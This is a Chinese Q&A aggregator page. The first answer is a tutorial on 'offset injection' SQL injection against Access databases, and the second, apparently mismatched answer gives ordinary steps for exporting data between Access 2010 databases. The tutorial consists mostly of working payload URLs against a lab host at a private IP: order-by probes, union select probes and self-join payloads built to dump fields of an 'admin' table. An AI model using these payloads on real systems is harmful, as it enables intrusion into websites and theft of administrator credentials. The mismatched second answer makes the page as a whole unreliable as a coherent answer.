发布网友 发布时间:2022-04-28 14:59
共2个回答
懂视网 时间:2022-05-03 12:19
偏移注入主要是针对知道表,但是不知道字段的ACCESS数据库。
比如我们已经知道了表名是 admin
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22 返回正常
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23 返回错误
字段数为 22
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 返回同上图一样得显示位页面
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin 返回错误
说明了admin表下有16个字段。
1. 22-16 = 6
2. 22-(6*2) = 10
所以答案就是 10
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
二级偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:这里是10个字段再减去了表里的6个字段,所以二级偏移这里是select 1,2,3,4
注意:查看源代码有奇效,可能会出现惊喜
ACCESS数据库偏移注入
标签:lang 说明 image dmi mic nio 判断 数据 access
热心网友 时间:2022-05-03 09:27
将一个access数据库中的数据导入到另一个access数据库中的方法:
1、在 Access 2010「外部数据」选项卡的「导出」组中,单击「其他」按钮,然后在其他下拉列表中单击「 Access 数据库 」按钮。系统打开窗口,在「文件名」文本框中,指定目标数据库的名称。如果不覆盖目标数据库中同名的现有对象,则在「导出-Access数据库」对话框中更改新对象的名称。
2、如果选定对象是一个表,则指定想要导出表的定义和数据,还是仅导出定义。单击「确定」按钮完成操作。
3、如果目标数据库中存在同名的对象,将询问是否覆盖此对象,单击「是」进行覆盖;如果单击「否」,则返回到「导出-Access数据库」对话框。也可以指定目标数据库中未使用的名称,然后单击「确定」按钮。